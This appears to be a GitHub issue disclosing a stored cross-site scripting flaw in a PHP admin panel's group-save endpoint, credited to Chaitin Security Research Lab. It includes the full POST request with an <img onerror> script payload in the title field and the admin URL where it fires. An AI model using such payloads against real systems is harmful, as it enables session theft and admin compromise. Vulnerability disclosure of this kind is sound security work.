Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":[],"theme":"template"}`
then you can view xss in url: http://192.168.3.129:8091/admin1#adminGroup/index
The text was updated successfully, but these errors were encountered:
find by Chaitin Security Research Lab
Sorry, something went wrong.
No branches or pull requests
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#adminGroup/index

`POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":[],"theme":"template"}`

then you can view xss in

url:
http://192.168.3.129:8091/admin1#adminGroup/index
The text was updated successfully, but these errors were encountered: